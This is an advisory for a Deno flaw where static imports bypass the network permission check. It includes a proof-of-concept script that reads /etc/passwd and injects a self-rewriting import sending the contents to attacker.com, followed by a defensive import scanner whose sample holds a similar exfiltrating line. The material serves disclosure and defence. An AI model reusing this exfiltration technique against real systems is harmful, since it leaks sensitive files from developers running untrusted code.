CVE-2024-21486

Date: August 19, 2025

### Summary

Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.

### Details

Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways when third-party code is directly or indirectly executed with `deno run`:

1. The simplest payload is a tracking-pixel-like import that attackers place in their code to find out when developers run the attacker-controlled code.
2. When the `--allow-write` and `--allow-read` permissions are given, an attacker can perform a more sophisticated two-step attack: on the first execution the code generates a ts/js file containing a static import, and on the second execution that static import is loaded.

### PoC

```ts
// Resolve this module's own path so it can rewrite itself.
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
// Needs --allow-read: the data to exfiltrate.
let passFile = await Deno.readTextFile("/etc/passwd");
// A static import whose URL carries the file contents in the query string.
let pre =
  'import {foo} from "https://attacker.com?val=' +
  encodeURIComponent(passFile) + '";\n';
// Needs --allow-write: on the next run Deno fetches the import while loading the module.
await Deno.writeTextFile(__filename, pre + oldContent);
```

Executing a file containing this payload twice with `deno run --allow-read --allow-write` causes the password file to leak on the network, even though no network permission was granted: the first run prepends the import line to the file itself, and the second run resolves that static import (sending the URL-encoded file contents to the remote host) while the module graph is loaded, before any runtime permission check applies.

This vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
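The two-step payload only works because the runtime fetches static imports while loading the module graph, before any permission check runs. On versions without `--allow-import`, one practical defence is to inspect the source for remote static imports before handing it to `deno run`. The scanner below is an added example, not code from the Deno project or from the advisory; it assumes a caller-supplied host allowlist, a constructed sample module `SAMPLE_SOURCE` that mimics a file after the payload's first run, and the hostname `attacker.example` as a stand-in for the advisory's `attacker.com`. It uses only the WHATWG `URL` class, so it runs under both Deno and Node.

```typescript
// Added example (not from the Deno project or the advisory PoC): a pre-run scan
// for remote *static* imports in TS/JS source. Static imports are the form that
// bypassed the network permission check; dynamic import(...) expressions are
// deliberately ignored because those are permission-checked at runtime.

interface RemoteImport {
  specifier: string;  // raw import specifier as written in the source
  host: string;       // URL host, including a non-default port if present
  allowed: boolean;   // host is on the caller-supplied allowlist
  queryBytes: number; // length of the query string; long values suggest exfiltration
}

// Matches `import ... from "spec"`, `export ... from "spec"` and bare `import "spec"`.
// The lazy class [^'"`;()]*? may span lines (multi-line import lists) but stops at a
// string, statement end or parenthesis, so `import("...")` never matches.
const STATIC_IMPORT_RE =
  /^[ \t]*(?:import|export)\b[^'"`;()]*?\bfrom[ \t]*["']([^"']+)["']|^[ \t]*import[ \t]*["']([^"']+)["']/gm;

// Absolute http(s) URL for a specifier, or null when it is relative/bare (resolved on
// disk, not fetched) or uses another scheme (npm:/jsr: go through registry config).
function parseRemoteUrl(specifier: string) {
  try {
    const url = new URL(specifier);
    return url.protocol === "http:" || url.protocol === "https:" ? url : null;
  } catch (_e) {
    return null;
  }
}

function scanStaticImports(source: string, allowedHosts: string[]): RemoteImport[] {
  const allow = allowedHosts.map((h) => h.toLowerCase());
  const found: RemoteImport[] = [];
  const re = new RegExp(STATIC_IMPORT_RE.source, "gm"); // fresh lastIndex per call
  let m: RegExpExecArray | null;
  while ((m = re.exec(source)) !== null) {
    const specifier = m[1] !== undefined ? m[1] : m[2];
    const url = parseRemoteUrl(specifier);
    if (url === null) continue;
    found.push({
      specifier,
      host: url.host,
      allowed: allow.indexOf(url.host.toLowerCase()) !== -1,
      queryBytes: url.search.length,
    });
  }
  return found;
}

// Remote static imports whose host is not on the allowlist: on vulnerable versions
// these are fetched (query string included) before any permission check.
function unexpectedRemoteImports(source: string, allowedHosts: string[]): RemoteImport[] {
  return scanStaticImports(source, allowedHosts).filter((r) => !r.allowed);
}

// The Deno 2 equivalent of the same allowlist, in the `--allow-import=host:port`
// form described in the Deno security docs linked above (port 443 assumed when absent).
function allowImportFlag(allowedHosts: string[]): string {
  return "--allow-import=" +
    allowedHosts.map((h) => (h.indexOf(":") !== -1 ? h : h + ":443")).join(",");
}

// Constructed sample (not a real file): a module as it looks after the advisory
// payload's first run has prepended its exfiltrating import line.
const SAMPLE_SOURCE = [
  'import {foo} from "https://attacker.example?val=root%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash";',
  'import { serve } from "https://deno.land/std@0.224.0/http/server.ts";',
  'import { helper } from "./helper.ts";',
  'const mod = await import("https://cdn.example/dynamic.ts"); // dynamic: permission-checked',
  "serve(helper);",
].join("\n");

for (const hit of unexpectedRemoteImports(SAMPLE_SOURCE, ["deno.land"])) {
  console.log(`unexpected static import from ${hit.host} (${hit.queryBytes} query bytes)`);
}
console.log(allowImportFlag(["deno.land"]));
```

Against the sample, only the `attacker.example` import is reported; the `deno.land` import is on the allowlist, the relative import is never fetched, and the dynamic import is skipped because the runtime already gates it. On Deno 2 the same allowlist becomes `deno run --allow-import=deno.land:443 main.ts`, which rejects the injected import at load time instead of relying on a scan.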

Severity Score

Weakness Type (CWE)

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Top Fix

Upgrade Version

Upgrade deno to version 2.0.0

CVSS v3.1

Base Score: 5.3 (Medium; computed from the metrics below)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector (AV): NETWORK
Attack Complexity (AC): LOW
Privileges Required (PR): NONE
User Interaction (UI): NONE
Scope (S): UNCHANGED
Confidentiality (C): LOW
Integrity (I): NONE
Availability (A): NONE
